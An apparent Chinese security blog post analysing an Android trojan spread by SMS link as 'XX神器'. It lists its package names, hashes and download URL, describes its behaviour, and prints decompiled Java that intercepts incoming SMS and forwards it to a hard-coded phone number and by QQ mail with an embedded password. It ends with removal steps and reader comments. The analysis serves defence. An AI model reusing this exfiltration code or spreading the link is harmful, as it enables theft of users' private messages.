之前本文标题及内容误将XXShenqi写作XXZhushou,是作者一时手滑,想到了另一个应用了233
病毒指纹
释放器包名:com.example.xxshenqi释放器MD5:5956c29ce2e17f49a71ac8526dd9cde3本体包名:com.example.com.android.trogoogle本体MD5:b0dea6906329c47edbecd48adc15a996
收到朋友的短信:“XX看这个,http://cdn.yyupload.com/down/4279193/XXshenqi.apk ”时,千万不要打开,这是一个可以盗取用户信息的手机病毒
目前主流手机安全软件均为能查杀该病毒,属于0day爆发状态;但是具有权限管理功能的安全软件可以拦截短信发送,但不能拦截邮件发送(除非禁止应用联网)
其实这是一个写得很菜的病毒,类似于PC时代的VB脚本小子的那种
病毒行为
经过逆向分析得知病毒具有以下行为
- 释放器(XX神器)安装后,诱导用户安装“资源包”,即病毒本体
- 本体监听android.permission.RECEIVE_BOOT_COMPLETED和android.permission.RECEIVE_SMS广播实现自启动
- 本体接收来自18670259904手机号的短信
- 本体收到短信后,自动发送短信到手机号,及邮箱[email protected],关键代码如下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 |
//..... abortBroadcast(); System.out.println("木马收到非命令短信。发送到控端=============================="); SmsManager localSmsManager = SmsManager.getDefault(); String str4; if (str3.length() != 11) { System.out.println("木马觉得淘宝信息=============================="); str4 = "【特殊消息】" + str2; if (str4.length() > 60) { localSmsManager.sendTextMessage("18163657397", null, str4.substring(0, str4.length() / 2), null, null); localSmsManager.sendTextMessage("18163657397", null, str4.substring(1 + str4.length() / 2), null, null); } } for (;;) { new Thread() { public void run() { System.out.println("木马Sleep(1000)=============================="); try { Thread.sleep(1000L); System.out.println("木马killProcess================\t"); Process.killProcess(Process.myPid()); return; } catch (InterruptedException localInterruptedException) { for (;;) { localInterruptedException.printStackTrace(); } } } }.start(); break; localSmsManager.sendTextMessage("18163657397", null, str4, null, null); continue; System.out.println("木马觉得是普通信息=============================="); } } //..... |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
protected void onHandleIntent(Intent paramIntent) { System.out.println("木马进入MySendEmailService=============================="); String str = paramIntent.getStringExtra("String"); System.out.println("木马开始发送邮件============================"); MailSenderInfo localMailSenderInfo = new MailSenderInfo(); localMailSenderInfo.setMailServerHost("smtp.qq.com"); localMailSenderInfo.setMailServerPort("25"); localMailSenderInfo.setValidate(true); localMailSenderInfo.setPassword("lishulili."); localMailSenderInfo.setSubject("信息"); localMailSenderInfo.setContent(str); new SimpleMailSender().sendTextMail(localMailSenderInfo); SimpleMailSender.sendHtmlMail(localMailSenderInfo); System.out.println("木马完成发送邮件============================="); System.out.println("木马离开MySendEmailService============================="); System.out.println("木马killProcess=============================="); Process.killProcess(Process.myPid()); } |
查杀方案
进入设置->应用,卸载名为XX神器,及com.android.Trogoogle的应用
尽快修改各类账号密码
第一段话算是高级黑么
你懂就好【并没有
_(:з”∠)_这”病毒”也是写的很高贵呢
_(:з”∠)_